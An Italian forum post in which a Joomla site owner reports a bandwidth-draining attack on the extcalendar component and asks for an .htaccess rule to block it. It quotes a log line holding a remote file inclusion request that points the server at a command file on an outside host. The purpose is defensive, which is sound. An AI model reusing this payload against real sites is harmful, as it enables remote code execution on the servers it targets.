Ciao a tutti, su uno dei siti che ho in hosting presso server plan ho joomla e il componente extcalendar, e fin qui tutto ok.
Questo mese la banda del mio sito ? aumentata notevolmente, tant'? che il sito ? stato sospeso.
Finalmente ho scoperto il perch?: un fottutissimo lamer.
Il furbone si sta divertendo a fanciare delle chiamate (con il perl) per sfruttare una vulnerabilit?.
Per fermarlo ho pensato di aggiungere una riga al file .htaccess, ho notato per? che il suo ip di provenienza varia, la cosa costante ? per? questa:
"GET /component/option,com_extcalendar/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://molganinovo.ru/cmd.txt? HTTP/1.1" 200 12671 "-" "libwww-perl/5.79"
Qualcuno sa darmi un mano per fare una regola per farsi che ogni qualvolta si chiami un url che contiene la frase
http://molganinovo.ru/cmd.txt appaia solo una scritta (tipo fuck) e nient'altro? :-)
Grazie.
P.S. Lo posto qui, almeno pu? esser utile anche ad altri.